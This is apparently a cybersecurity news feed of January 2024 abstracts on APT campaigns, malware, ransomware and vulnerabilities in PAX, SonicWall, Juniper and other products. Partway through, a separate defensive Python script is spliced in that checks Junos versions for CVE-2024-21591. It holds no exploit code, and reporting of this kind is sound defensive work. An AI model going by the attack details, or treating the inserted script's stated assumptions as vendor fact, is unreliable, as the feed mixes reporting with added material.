Abstract The Russia-linked threat actor known as COLDRIVER has been observed evolving its tradecraft to go beyond credential harvesting to deliver its first-ever custom malware written in the Rust programming language. Google's Threat Analysis Group (TAG), which shared details of the latest activity, said the attack chains leverage PDFs as decoy documents to trigger the infection sequence. The lures are sent from impersonation accounts. COLDRIVER, also known by the names Blue Callisto, BlueCharlie (or TAG-53), Calisto (alternately spelled Callisto), Gossamer Bear, Star Blizzard (formerly SEABORGIUM), TA446, and UNC4057, has been active since 2019, targeting a wide range of sectors. This includes academia, defense, governmental organizations, NGOs, think tanks, political outfits, and, recently, defense-industrial targets and energy facilities. "Targets in the U.K. and U.S. appear to have been most affected by Star Blizzard activity, however activity has also been observe

The Hacker News

January 18, 2024 – Malware

Malware Exploiting 9Hits, Turns Docker Servers into Crypto Miners Full Text

Abstract Attackers are using off-the-shelf images from Dockerhub to spread malware, with the 9Hits app visiting various websites and the XMRig miner disabled from visiting crypto-related sites to prevent analysis.

Cyware

January 18, 2024 – Vulnerabilities

TensorFlow CI/CD Flaw Exposed Supply Chain to Poisoning Attacks Full Text

Abstract Continuous integration and continuous delivery (CI/CD) misconfigurations discovered in the open-source  TensorFlow  machine learning framework could have been exploited to orchestrate  supply chain attacks . The misconfigurations could be abused by an attacker to "conduct a supply chain compromise of TensorFlow releases on GitHub and PyPi by compromising TensorFlow's build agents via a malicious pull request," Praetorian researchers Adnan Khan and John Stawinski  said  in a report published this week. Successful exploitation of these issues could permit an external attacker to upload malicious releases to the GitHub repository, gain remote code execution on the self-hosted GitHub runner, and even retrieve a GitHub Personal Access Token (PAT) for the  tensorflow-jenkins user . TensorFlow uses GitHub Actions to automate the software build, test, and deployment pipeline. Runners, which refer to machines that execute jobs in a GitHub Actions workflow, can be either self-

The Hacker News

January 18, 2024 – Vulnerabilities

Apple, AMD, Qualcomm, Imagination GPUs Open to Data Theft Using New LeftoverLocals Vulnerability Full Text

Abstract The vulnerability affects various GPU products, with AMD and Apple planning mitigations, and Imagination and Qualcomm issuing fixes. Nvidia and Arm are reportedly unaffected.

Cyware

January 18, 2024 – Education

MFA Spamming and Fatigue: When Security Measures Go Wrong Full Text

Abstract In today's digital landscape, traditional password-only authentication systems have proven to be vulnerable to a wide range of cyberattacks. To safeguard critical business resources, organizations are increasingly turning to multi-factor authentication (MFA) as a more robust security measure. MFA requires users to provide multiple authentication factors to verify their identity, providing an additional layer of protection against unauthorized access. However, cybercriminals are relentless in their pursuit of finding ways to  bypass MFA systems . One such method gaining traction is MFA spamming attacks, also known as MFA fatigue, or  MFA bombing . This article delves into MFA spamming attacks, including the best practices to mitigate this growing threat. What is MFA spamming? MFA spamming refers to the malicious act of inundating a target user's email, phone, or other registered devices with numerous MFA prompts or confirmation codes. The objective behind this tactic is to o

The Hacker News

January 18, 2024 – Disinformation

OpenAI Combats Election Misinformation Amid Growing Concerns Full Text

Abstract OpenAI is taking steps to prevent the use of ChatGPT in spreading election misinformation, including restricting its use for political campaigning and lobbying, and creating tools to empower voters to assess the authenticity of images.

Cyware

January 18, 2024 – Vulnerabilities

PixieFail UEFI Flaws Expose Millions of Computers to RCE, DoS, and Data Theft Full Text

Abstract Multiple security vulnerabilities have been disclosed in the TCP/IP network protocol stack of an open-source reference implementation of the Unified Extensible Firmware Interface (UEFI) specification used widely in modern computers. Collectively dubbed PixieFail by Quarkslab, the nine issues reside in the TianoCore EFI Development Kit II (EDK II) and could be exploited to achieve remote code execution, denial-of-service (DoS), DNS cache poisoning, and leakage of sensitive information. UEFI firmware – which is responsible for booting the operating system – from AMI, Intel, Insyde, and Phoenix Technologies is impacted by the shortcomings. EDK II incorporates its own TCP/IP stack called NetworkPkg to enable network functionalities available during the initial Preboot eXecution Environment (PXE, pronounced "pixie") stage, which allows for management tasks in the absence of a running operating system. In other words, it is a client-server interface to boot a

The Hacker News

January 18, 2024 – Attack

Pro-Russia Group Hit Swiss Government Sites After Zelensky Visit in Davos Full Text

Abstract Switzerland's National Cyber Security Centre promptly detected and responded to the DDoS attacks, restoring access to the targeted websites, including the Davos-Klosters ski resort and Swiss Ministry of the Interior.

Cyware

January 18, 2024 – Phishing

Iranian Hackers Masquerade as Journalists to Spy on Israel-Hamas War Experts Full Text

Abstract High-profile individuals working on Middle Eastern affairs at universities and research organizations in Belgium, France, Gaza, Israel, the U.K., and the U.S. have been targeted by an Iranian cyber espionage group called  Mint Sandstorm  since November 2023. The threat actor "used bespoke phishing lures in an attempt to socially engineer targets into downloading malicious files," the Microsoft Threat Intelligence team  said  in a Wednesday analysis, describing it as a "technically and operationally mature subgroup of Mint Sandstorm." The attacks, in select cases, involve the use of a previously undocumented backdoor dubbed MediaPl, indicating ongoing endeavors by Iranian threat actors to refine their post-intrusion tradecraft. Mint Sandstorm, also known as APT35, Charming Kitten, TA453, and Yellow Garuda, is  known  for its  adept social engineering campaigns , even resorting to legitimate but compromised accounts to send bespoke phishing emails to prospective

The Hacker News

January 18, 2024 – General

As Hacks Worsen, SEC Turns up the Heat on CISOs Full Text

Abstract The cybersecurity industry is facing increasing legal oversight and consequences, making it riskier to work in this field. Companies are now required to disclose "material" security incidents within four working days to the SEC.

Cyware

January 18, 2024 – Attack

Taiwanese Semiconductor Company Foxsemicon Suffers Ransomware Attack Full Text

Abstract Foxsemicon, a major semiconductor manufacturer in Taiwan, was targeted by the LockBit ransomware gang, who threatened to leak customers' personal data if a ransom was not paid.

Cyware

January 17, 2024 – Vulnerabilities

Vulnerabilities Discovered in Android-based POS Terminals From PAX Technology Full Text

Abstract The PoS terminals from PAX Technology, based on Android, are found to have several vulnerabilities that can be exploited to execute arbitrary code or commands, according to a report by STM Cyber.

Cyware

January 17, 2024 – Vulnerabilities

PAX PoS Terminal Flaw Could Allow Attackers to Tamper with Transactions Full Text

Abstract The point-of-sale (PoS) terminals from PAX Technology are impacted by a collection of high-severity vulnerabilities that can be weaponized by threat actors to execute arbitrary code. The STM Cyber R&D team, which reverse engineered the Android-based devices manufactured by the Chinese firm owing to their rapid deployment in Poland, said it unearthed half a dozen flaws that allow for privilege escalation and local code execution from the bootloader. Details about one of the vulnerabilities (CVE-2023-42133) have currently been withheld. The other flaws are listed below -
CVE-2023-42134 & CVE-2023-42135 (CVSS score: 7.6) - Local code execution as root via kernel parameter injection in fastboot (Impacts PAX A920Pro/PAX A50)
CVE-2023-42136 (CVSS score: 8.8) - Privilege escalation from any user/application to system user via shell injection in a binder-exposed service (Impacts all Android-based PAX PoS devices)
CVE-2023-42137 (CVSS score: 8.8) - Privilege escalation from

The Hacker News

January 17, 2024 – Criminals

Detained Russian Student Allegedly Helped Ukrainian Hackers With Cyberattacks Full Text

Abstract A Russian tech student faces treason charges for allegedly helping Ukrainian hackers carry out cyberattacks against Russia, revealing the ongoing cyberwar between the two countries.

Cyware

January 17, 2024 – Solution

Combating IP Leaks into AI Applications with Free Discovery and Risk Reduction Automation Full Text

Abstract Wing Security announced today that it now offers  free discovery and a paid tier for automated control  over thousands of AI and AI-powered SaaS applications. This will allow companies to better protect their intellectual property (IP) and data against the growing and evolving risks of AI usage. SaaS applications seem to be multiplying by the day, and so does their integration of AI capabilities. According to Wing Security, a SaaS security company that researched over 320 companies, a staggering 83.2% use GenAI applications. While this statistic might not come as a surprise, the research showed that 99.7% of organizations use SaaS applications that leverage AI capabilities to deliver their services. This usage of GenAI in SaaS applications that are not 'pure' AI often goes unnoticed by security teams and users alike. 70% of the most popular GenAI applications may use your data to train their models, and in many cases it's completely up to you to configure it differently

The Hacker News

January 17, 2024 – Business

Cyber Startup Vicarius Raises $30 Million Series B for Vulnerability Remediation Platform Full Text

Abstract The Israeli startup has secured a $30 million Series B funding led by Bright Pixel Capital. The company's total funding now exceeds $56 million, with participation from other investors such as JVP, AllegisCyber Capital, AlleyCorp, and Strait Capital.

Cyware

January 17, 2024 – Government

Feds Warn of AndroxGh0st Botnet Targeting AWS, Azure, and Office 365 Credentials Full Text

Abstract The U.S. Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI)  warned  that threat actors deploying the  AndroxGh0st  malware are creating a botnet for "victim identification and exploitation in target networks." A Python-based malware,  AndroxGh0st  was first documented by Lacework in December 2022, with the malware inspiring several  similar tools  like AlienFox, GreenBot (aka Maintance), Legion, and Predator. The cloud attack tool is capable of infiltrating servers vulnerable to known security flaws to access Laravel environment files and steal credentials for high-profile applications such as Amazon Web Services (AWS), Microsoft Office 365, SendGrid, and Twilio. Some of the notable flaws weaponized by the attackers include  CVE-2017-9841  (PHPUnit),  CVE-2021-41773  (Apache HTTP Server), and  CVE-2018-15133  (Laravel Framework). "AndroxGh0st has multiple features to enable SMTP abuse including scanning, exploitat

The Hacker News

January 17, 2024 – Phishing

Cheap .cloud Domains and Shark Tank Impersonation Fuels Unhealthy Scams Full Text

Abstract Scammers are using fake news campaigns and cheaply acquired domain names to sell dubious health products, often claiming endorsements from popular entrepreneurial reality shows like Shark Tank and Dragons' Den.

Cyware

January 17, 2024 – Education

Webinar: The Art of Privilege Escalation - How Hackers Become Admins Full Text

Abstract In the digital age, the battleground for security professionals is not only evolving, it's expanding at an alarming rate. The upcoming webinar, "The Art of Privilege Escalation - How Hackers Become Admins," offers an unmissable opportunity for IT security experts to stay ahead in this relentless cyber war. Privilege escalation - the term might sound benign, but in the hands of a skilled hacker, it's a devastating tactic. It's a method where cyber attackers, starting as standard users, clandestinely climb the ladder of access, eventually gaining root-level control. This isn't just a breach; it's a systematic takeover of your entire network. Picture a scenario where cybercriminals roam freely through your network, turning your layers of defense into mere spectators. It's a chilling thought, but it's a reality faced by organizations across the globe. What if you could anticipate and counter these threats? Expertly delivered by Joseph Carson, Ch

The Hacker News

January 17, 2024 – Breach

Progress Software’s MOVEit Meltdown: Uncovering the Fallout Full Text

Abstract The data breach involving Progress Software’s MOVEit file-transfer service exposed millions of individuals and thousands of organizations, highlighting the far-reaching impact of supply chain cyberattacks.

Cyware

January 17, 2024 – Privacy

New iShutdown Method Exposes Hidden Spyware Like Pegasus on Your iPhone Full Text

Abstract Cybersecurity researchers have identified a "lightweight method" called  iShutdown  for reliably identifying signs of spyware on Apple iOS devices, including notorious threats like NSO Group's  Pegasus , QuaDream's  Reign , and Intellexa's  Predator .  Kaspersky, which analyzed a set of iPhones that were compromised with Pegasus, said the infections left traces in a file named "Shutdown.log," a text-based system log file available on all iOS devices and which records every reboot event alongside its environment characteristics. "Compared to more time-consuming acquisition methods like forensic device imaging or a full iOS backup, retrieving the Shutdown.log file is rather straightforward," security researcher Maher Yamout  said . "The log file is stored in a sysdiagnose (sysdiag) archive." The Russian cybersecurity firm said it identified entries in the log file that recorded instances where "sticky" processes, such as

The Hacker News

January 17, 2024 – Business

Snyk Acquires Helios for Runtime Visibility Full Text

Abstract Snyk's acquisition of Helios marks its second move in developer-led application security posture management, following the previous acquisition of Enso Security, further strengthening its platform with prioritization and remediation capabilities.

Cyware

January 17, 2024 – Vulnerabilities

GitHub Rotates Keys After High-Severity Vulnerability Exposes Credentials Full Text

Abstract GitHub has revealed that it has rotated some keys in response to a security vulnerability that could be potentially exploited to gain access to credentials within a production container. The Microsoft-owned subsidiary said it was made aware of the problem on December 26, 2023, and that it addressed the issue the same day, in addition to rotating all potentially exposed credentials out of an abundance of caution. The rotated keys include the GitHub commit signing key as well as GitHub Actions, GitHub Codespaces, and Dependabot customer encryption keys, necessitating users who rely on these keys to import the new ones. There is no evidence that the high-severity vulnerability, tracked as CVE-2024-0200 (CVSS score: 7.2), has been previously found and exploited in the wild. "This vulnerability is also present on GitHub Enterprise Server (GHES)," GitHub's Jacob DePriest said. "However, exploitation requires an authenticated user with an organization owner role

The Hacker News

January 17, 2024 – Cryptocurrency

Crypto Trading Firm Closes Shop After $8 Million NY State Fine Over Security Issues Full Text

Abstract Genesis Global Trading violated its BitLicense terms, with late and inadequate cybersecurity risk assessments, and appeared deficient in filing suspicious activity reports for potential money laundering.

Cyware

January 17, 2024 – Vulnerabilities

Citrix Warns Admins to Immediately Patch NetScaler for Actively Exploited Zero-Days Full Text

Abstract The vulnerabilities, tracked as CVE-2023-6548 and CVE-2023-6549, can lead to remote code execution or denial-of-service attacks, and specific recommendations for mitigating the risks are provided.

Cyware

January 17, 2024 – Solution

Adalanche: Open-Source Active Directory ACL Visualizer, Explorer Full Text

Abstract The tool offers a visual attack graph representation of Active Directory in the browser, along with the ability to collect data from Windows machines and perform in-depth analysis.

Cyware

January 16, 2024 – Education

Three Ways to Combat Rising OAuth SAAS Attacks Full Text

Abstract OAuth attacks are on the rise, and organizations must implement strong access controls, fortify identity security for user accounts, and monitor third-party app activity to prevent unauthorized access to SaaS resources.

Cyware

January 16, 2024 – Vulnerabilities

Alert: Over 178,000 SonicWall Firewalls Potentially Vulnerable to Exploits - Act Now Full Text

Abstract Over 178,000 SonicWall firewalls exposed on the internet are vulnerable to at least one of the two security flaws that could be potentially exploited to cause a denial-of-service (DoS) condition and remote code execution (RCE). "The two issues are fundamentally the same but exploitable at different HTTP URI paths due to reuse of a vulnerable code pattern," Jon Williams, a senior security engineer at Bishop Fox, said in a technical analysis shared with The Hacker News. The vulnerabilities in question are listed below -
CVE-2022-22274 (CVSS score: 9.4) - A stack-based buffer overflow vulnerability in SonicOS via HTTP request allows a remote, unauthenticated attacker to cause DoS or potentially result in code execution in the firewall.
CVE-2023-0656 (CVSS score: 7.5) - A stack-based buffer overflow vulnerability in SonicOS allows a remote, unauthenticated attacker to cause DoS, which could result in a crash.
While there are no reports of exploitation of the flaws

The Hacker News

January 16, 2024 – Breach

Update: Cloud Vendor Returns Stolen Hospital Data Full Text

Abstract A cloud services firm returned patient data stolen in a ransomware attack by the LockBit gang to a New York hospital alliance. The hospitals had sued LockBit as a legal maneuver to force the storage firm to return the data.

Cyware

January 16, 2024 – Insider Threat

Case Study: The Cookie Privacy Monster in Big Global Retail Full Text

Abstract Explore how an advanced exposure management solution saved a major retail industry client from ending up on the naughty step due to a misconfiguration in its cookie management policy. This wasn't anything malicious, but with modern web environments being so complex, mistakes can happen, and non-compliance fines can be just an oversight away. Download the full case study here . As a child, did you ever get caught with your hand in the cookie jar and earn yourself a telling-off? Well, even if you can still remember being outed as a cookie monster, the punishments for today's thieving beasts are worse. Millions of dollars worse. Cookies are an essential part of modern web analytics. A cookie is a small piece of text data that records website visitor preferences along with their behaviors, and its job is to help personalize their browsing experience. Just as you needed parental consent to access the cookie jar all those years ago, your business now needs to obtain user consent before i

The Hacker News

January 16, 2024 – Phishing

Flipping the BEC Funnel: Phishing in the Age of GenAI Full Text

Abstract The evolution of phishing techniques, including the use of advanced AI-driven tools, has led to a surge in highly personalized and convincing phishing attacks, posing a significant challenge to traditional email security solutions.

Cyware

January 16, 2024 – Malware

Remcos RAT Spreading Through Adult Games in New Attack Wave Full Text

Abstract The remote access trojan (RAT) known as Remcos RAT has been found being propagated via webhards by disguising it as adult-themed games in South Korea. WebHard, short for  web hard drive , is a popular online file storage system used to upload, download, and share files in the country. While webhards have been used in the past to deliver  njRAT ,  UDP RAT, and DDoS botnet malware , the AhnLab Security Emergency Response Center's (ASEC) latest analysis shows that the technique has been adopted to distribute Remcos RAT. In these attacks, users are tricked into opening booby-trapped files by passing them off as adult games, which, when launched, execute malicious Visual Basic scripts in order to run an intermediate binary named "ffmpeg.exe." This results in the retrieval of Remcos RAT from an actor-controlled server. A sophisticated RAT, Remcos (aka Remote Control and Surveillance) facilitates unauthorized remote control and surveillance of compromised hosts, enablin

The Hacker News

January 16, 2024 – Government

DOD Unveils First-Ever National Defense Industrial Strategy Full Text

Abstract The National Defense Industrial Strategy focuses on resilient supply chains, workforce readiness, flexible acquisitions, and economic deterrence to improve defense industrial ecosystem.

Cyware

January 16, 2024 – Cryptocurrency

Inferno Malware Masqueraded as Coinbase, Drained $87 Million from 137,000 Victims Full Text

Abstract The operators behind the now-defunct  Inferno Drainer  created more than 16,000 unique malicious domains over a span of one year between 2022 and 2023. The scheme "leveraged high-quality phishing pages to lure unsuspecting users into connecting their cryptocurrency wallets with the attackers' infrastructure that spoofed Web3 protocols to trick victims into authorizing transactions," Singapore-headquartered Group-IB  said  in a report shared with The Hacker News. Inferno Drainer, which was active from  November 2022 to November 2023 , is estimated to have reaped over  $87 million in illicit profits  by scamming more than 137,000 victims. The malware is part of a broader set of similar offerings that are available to affiliates under the scam-as-a-service (or drainer-as-a-service) model in exchange for a 20% cut of their earnings. What's more, customers of Inferno Drainer could either upload the malware to their own phishing sites, or make use of the developer's service for creatin

The Hacker News

January 16, 2024 – Attack

Anonymous Sudan Claims London Internet Exchange Attack Over Yemen Strikes Full Text

Abstract The Russia-affiliated hacktivist group, Anonymous Sudan, claimed responsibility for a cyberattack on the London Internet Exchange (LINX) as a response to Britain's support for Israel and airstrikes on Yemen.

Cyware

January 16, 2024 – Vulnerabilities

Hackers Weaponize Windows Flaw to Deploy Crypto-Siphoning Phemedrone Stealer Full Text

Abstract Threat actors have been observed leveraging a now-patched security flaw in Microsoft Windows to deploy an open-source information stealer called Phemedrone Stealer. "Phemedrone targets web browsers and data from cryptocurrency wallets and messaging apps such as Telegram, Steam, and Discord," Trend Micro researchers Peter Girnus, Aliakbar Zahravi, and Simon Zuckerbraun said. "It also takes screenshots and gathers system information regarding hardware, location, and operating system details. The stolen data is then sent to the attackers via Telegram or their command-and-control (C&C) server." The attacks leverage CVE-2023-36025 (CVSS score: 8.8), a security bypass vulnerability in Windows SmartScreen that could be exploited by tricking a user into clicking on a specially crafted Internet Shortcut (.URL) or a hyperlink pointing to an Internet Shortcut file. The actively exploited shortcoming was addressed by Microsoft as part of its November 2023 Patch Tuesday updates.

The Hacker News

January 16, 2024 – Criminals

Threat Actor Puts GEICO Database for Sale on the Dark Web Full Text

Abstract The threat actor 'wangfei19860902055' advertised the sale of a database related to Government Employees Insurance Company (GEICO) on the dark web, containing 552,900 records with personal information. GEICO has not officially confirmed the breach.

Cyware

January 16, 2024 – Solution

Tsurugi Linux Tailors User Experience for Digital Forensics and OSINT Investigations Full Text

Abstract Tsurugi Linux offers a user-friendly interface with a logical sequence of forensic analysis tools, including support for live forensics, post-mortem analysis, digital evidence acquisition, malware analysis, OSINT, and computer vision activities.

Cyware

January 15, 2024 – Attack

NoName Targets Websites of Financial Services, Transportation, and Telecom Firms in Lithuania Full Text

Abstract Several prominent organizations in Lithuania, including Compensa Vienna Insurance Group, If Insurance, Lithuanian Roads Association, AD REM, INIT, and Balticum, have had their websites targeted by the pro-Russian hacktivist group NoName057(16), which carries out DDoS attacks rather than ransomware operations.

Cyware


January 15, 2024 – Vulnerabilities

Opera MyFlaw Bug Could Let Hackers Run ANY File on Your Mac or Windows Full Text

Abstract Cybersecurity researchers have disclosed a security flaw in the Opera web browser for Microsoft Windows and Apple macOS that could be exploited to execute any file on the underlying operating system. The remote code execution vulnerability has been codenamed MyFlaw by the Guardio Labs research team owing to the fact that it takes advantage of a feature called My Flow that makes it possible to sync messages and files between mobile and desktop devices. "This is achieved through a controlled browser extension, effectively bypassing the browser's sandbox and the entire browser process," the company said in a statement shared with The Hacker News. The issue impacts both the Opera browser and Opera GX. Following responsible disclosure on November 17, 2023, it was addressed as part of updates shipped on November 22, 2023. My Flow features a chat-like interface to exchange notes and files, the latter of which can be opened via a web interface, meaning a file can be ex

The Hacker News

January 15, 2024 – Business

Anonymous Collective Launches Cyberattack on Bahrain Over Yemen Airstrikes Full Text

Abstract The Anonymous Collective has launched a cyberattack on Bahrain in retaliation for its support of US and UK airstrikes on Yemen. Several Bahraini media outlets, including Akhbar al-Khaleej and Gulf Daily News, have been affected by the cyberattack.

Cyware

January 15, 2024 – Ransomware

3 Ransomware Group Newcomers to Watch in 2024 Full Text

Abstract The ransomware industry surged in 2023 as it saw an alarming 55.5% increase in victims worldwide, reaching a staggering 4,368 cases. [Figure 1: Year over year victims per quarter] The rollercoaster ride from explosive growth in 2021 to a momentary dip in 2022 was just a teaser—2023 roared back with the same fervor as 2021, propelling existing groups and ushering in a wave of formidable newcomers. [Figure 2: 2020-2023 ransomware victim count] LockBit 3.0 maintained its number one spot with 1047 victims achieved through the Boeing attack, the Royal Mail attack, and more. Alphv and Cl0p achieved far less success, with 445 and 384 victims attributed to them, respectively, in 2023. [Figure 3: Top 3 active ransomware groups in 2023] These 3 groups were heavy contributors to the boom in ransomware attacks in 2023, but they were not the sole groups responsible. Many attacks came from emerging ransomware gangs such as 8Base, Rhysida, 3AM, Malaslocker, BianLian, Play, Akira,

The Hacker News

January 15, 2024 – Malware

Azorult Malware Comes to the Fore in New Dark Web Campaign Full Text

Abstract The Azorult malware, known for stealing sensitive data, has resurfaced with a sophisticated approach. It is distributed through malicious PDF files that contain a shortcut file.

Cyware

January 15, 2024 – Vulnerabilities

High-Severity Flaws Uncovered in Bosch Thermostats and Smart Nutrunners Full Text

Abstract Multiple security vulnerabilities have been disclosed in Bosch BCC100 thermostats and Rexroth NXA015S-36V-B smart nutrunners that, if successfully exploited, could allow attackers to execute arbitrary code on affected systems. Romanian cybersecurity firm Bitdefender, which discovered the flaw in Bosch BCC100 thermostats last August, said the issue could be weaponized by an attacker to alter the device firmware and implant a rogue version. Tracked as CVE-2023-49722 (CVSS score: 8.3), the high-severity vulnerability was addressed by Bosch in November 2023. "A network port 8899 is always open in BCC101/BCC102/BCC50 thermostat products, which allows an unauthenticated connection from a local WiFi network," the company said in an advisory. The issue, at its core, impacts the WiFi microcontroller that acts as a network gateway for the thermostat's logic microcontroller. By exploiting the flaw, an attacker could send commands to the thermostat, including writing a malicious updat

The Hacker News

January 15, 2024 – Business

Microsoft to Keep All European Cloud Customers’ Personal Data Within EU Full Text

Abstract Microsoft has announced that it will store all customer data in the European Union (EU) rather than transferring it abroad. This move is aimed at complying with varying privacy regulations across jurisdictions.

Cyware

January 15, 2024 – Malware

Balada Injector Infects Over 7,100 WordPress Sites Using Plugin Vulnerability Full Text

Abstract Thousands of WordPress sites using a vulnerable version of the Popup Builder plugin have been compromised with a malware called Balada Injector. First documented by Doctor Web in January 2023, the campaign takes place in a series of periodic attack waves, weaponizing security flaws in WordPress plugins to inject a backdoor designed to redirect visitors of infected sites to bogus tech support pages, fraudulent lottery wins, and push notification scams. Subsequent findings unearthed by Sucuri have revealed the massive scale of the operation, which is said to have been active since 2017 and to have infiltrated no less than 1 million sites since then. The GoDaddy-owned website security company, which detected the latest Balada Injector activity on December 13, 2023, said it identified the injections on over 7,100 sites. These attacks take advantage of a high-severity flaw in Popup Builder (CVE-2023-6000, CVSS score: 8.8) – a plugin with more than 200,000 active installs – that was

The Hacker News

January 15, 2024 – Vulnerabilities

China Warns of Apple AirDrop De-Anonymization Flaw Full Text

Abstract The Beijing Wangshendongjian Judicial Appraisal Institute's claim that AirDrop's anonymization techniques can be easily circumvented raises concerns about the vulnerability of user identities and the potential for surveillance.

Cyware

January 15, 2024 – Denial Of Service

DDoS Attacks on the Environmental Services Industry Surge by 61,839% in 2023 Full Text

Abstract The environmental services industry witnessed an "unprecedented surge" in HTTP-based distributed denial-of-service (DDoS) attacks, accounting for half of all its HTTP traffic. This marks a 61,839% increase in DDoS attack traffic year-over-year, web infrastructure and security company Cloudflare said in its DDoS threat report for 2023 Q4 published last week. "This surge in cyber attacks coincided with COP 28, which ran from November 30th to December 12th, 2023," security researchers Omer Yoachimik and Jorge Pacheco said, describing it as a "disturbing trend in the cyber threat landscape." The uptick in HTTP attacks targeting environmental services websites is part of a larger trend observed annually over the past few years, specifically during COP 26 and COP 27, as well as other United Nations environment-related resolutions or announcements. "This recurring pattern underscores the growing intersection between environmental issues and cyber security, a nexus that is increasingl

The Hacker News

January 14, 2024 – Attack

New Findings Challenge Attribution in Denmark’s Energy Sector Cyberattacks Full Text

Abstract The cyber attacks targeting the energy sector in Denmark last year may not have had the involvement of the Russia-linked Sandworm hacking group, new findings from Forescout show. The intrusions, which targeted around 22 Danish energy organizations in May 2023, occurred in two distinct waves, one which exploited a security flaw in Zyxel firewalls (CVE-2023-28771) and a follow-on activity cluster that saw the attackers deploy Mirai botnet variants on infected hosts via an as-yet-unknown initial access vector. The first wave took place on May 11, while the second wave lasted from May 22 to 31, 2023. In one such attack detected on May 24, it was observed that the compromised system was communicating with IP addresses (217.57.80[.]18 and 70.62.153[.]174) that were previously used as command-and-control (C2) for the now-dismantled Cyclops Blink botnet. Forescout's closer examination of the attack campaign, however, has revealed that not only were the two waves unrelated, but also

The Hacker News

January 13, 2024 – Policy and Law

Fertility Test Lab Will Pay $1.25M to Settle Breach Lawsuit Full Text

Abstract The settlement includes reimbursement for out-of-pocket losses, credit monitoring, identity theft insurance, and a cash settlement payment for affected individuals, with an additional payment for California residents.

Cyware

January 13, 2024 – Attack

British Cosmetics Firm Lush Confirms Cyberattack Full Text

Abstract Lush has taken immediate steps to secure and screen all systems in order to contain the incident and limit its impact on their operations, while also informing relevant authorities about the incident.

Cyware

January 13, 2024 – Vulnerabilities

Critical RCE Vulnerability Uncovered in Juniper SRX Firewalls and EX Switches Full Text

Abstract Juniper Networks has released updates to fix a critical remote code execution (RCE) vulnerability in its SRX Series firewalls and EX Series switches. The issue, tracked as CVE-2024-21591, is rated 9.8 on the CVSS scoring system. "An out-of-bounds write vulnerability in J-Web of Juniper Networks Junos OS SRX Series and EX Series allows an unauthenticated, network-based attacker to cause a Denial-of-Service (DoS) or Remote Code Execution (RCE) and obtain root privileges on the device," the company said in an advisory. The networking equipment major, which is set to be acquired by Hewlett Packard Enterprise (HPE) for $14 billion, said the issue is caused by use of an insecure function allowing a bad actor to overwrite arbitrary memory. The flaw impacts the following versions, and has been fixed in versions 20.4R3-S9, 21.2R3-S7, 21.3R3-S5, 21.4R3-S5, 22.1R3-S4, 22.2R3-S3, 22.3R3-S2, 22.4R2-S2, 22.4R3, 23.2R1-S1, 23.2R2, 23.4R1, and later - Junos OS versions earlier than 20.4R

The Hacker News
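A version check against the fixed-release list in the Juniper entry above, added here as an example; it is not Juniper's tooling and not code from The Hacker News. It assumes the plain X.YRn[-Sm] version form, reads "and later" as any higher service release within the same X.Y train and R line, treats a train with no listed fixed release as still exposed, and, as an assumption made only for this example, treats trains newer than 23.4 as fixed. It is a version check only: whether J-Web is actually reachable on a given device is a separate question. The inventory at the bottom is constructed.

```python
import re
from typing import Iterable, List, NamedTuple, Tuple

# Fixed Junos OS releases for CVE-2024-21591, taken from the list in the entry above.
FIXED_VERSIONS = [
    "20.4R3-S9", "21.2R3-S7", "21.3R3-S5", "21.4R3-S5", "22.1R3-S4",
    "22.2R3-S3", "22.3R3-S2", "22.4R2-S2", "22.4R3", "23.2R1-S1",
    "23.2R2", "23.4R1",
]


class JunosVersion(NamedTuple):
    major: int     # e.g. 22 in 22.4R2-S2
    minor: int     # e.g. 4
    release: int   # the Rn number
    service: int   # the -Sm service-release number, 0 when absent


# Only the plain X.YRn[-Sm] form is handled; anything else (EVO builds, daily
# builds, ...) is rejected so it cannot be silently classified as fixed.
_VER_RE = re.compile(r"^(\d+)\.(\d+)R(\d+)(?:-S(\d+))?$")


def parse_junos(version: str) -> JunosVersion:
    m = _VER_RE.match(version.strip())
    if not m:
        raise ValueError(f"unrecognised Junos version string: {version!r}")
    major, minor, release, service = m.groups()
    return JunosVersion(int(major), int(minor), int(release), int(service or 0))


_FIXED = [parse_junos(v) for v in FIXED_VERSIONS]
_NEWEST_FIXED_TRAIN = max((f.major, f.minor) for f in _FIXED)


def is_fixed(version: str) -> bool:
    """True when `version` carries the CVE-2024-21591 fix.

    A version counts as fixed when it sits in the same X.Y train and the same
    Rn release as a listed fixed version and its service number is at least as
    high (that is how "and later" within a release line is read here). A train
    with no listed fixed release (for example 21.1) is treated as exposed.
    Assumption for this example: trains newer than the newest listed one (23.4)
    ship with the fix.
    """
    v = parse_junos(version)
    if (v.major, v.minor) > _NEWEST_FIXED_TRAIN:
        return True
    return any(
        (f.major, f.minor, f.release) == (v.major, v.minor, v.release)
        and v.service >= f.service
        for f in _FIXED
    )


def find_exposed(inventory: Iterable[Tuple[str, str]]) -> List[Tuple[str, str]]:
    """Return (hostname, version) pairs whose version is not known to be fixed.

    Unparseable version strings are reported as exposed rather than dropped,
    so a typo in the inventory cannot hide a device from the list.
    """
    exposed = []
    for host, version in inventory:
        try:
            fixed = is_fixed(version)
        except ValueError:
            fixed = False
        if not fixed:
            exposed.append((host, version))
    return exposed


# Constructed inventory for illustration; hostnames and versions are made up.
SAMPLE_INVENTORY = [
    ("srx-edge-1", "22.4R2-S1"),    # one service release short of the fix
    ("ex-core-1", "22.4R3"),        # listed as fixed
    ("srx-branch-2", "20.4R3-S9"),  # listed as fixed
    ("ex-lab-3", "21.1R3"),         # train with no listed fixed release
]

if __name__ == "__main__":
    for host, version in find_exposed(SAMPLE_INVENTORY):
        print(f"{host}: Junos {version} still exposed to CVE-2024-21591")
```

Feed it the output of your own device inventory (hostname and `show version` string per device); anything printed is a device to patch or to take J-Web off the network on.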

January 13, 2024 – General

Report: Elevated Ransomware Activity Hit Nearly 5,200 Organizations in 2023 Full Text

Abstract The most active ransomware groups in 2023 included AlphV, BianLian, Clop, LockBit 3.0, and Play, with AlphV being the most prolific and receiving substantial ransom payments.

Cyware

January 13, 2024 – Criminals

29-Year-Old Ukrainian Cryptojacking Kingpin Arrested for Exploiting Cloud Services Full Text

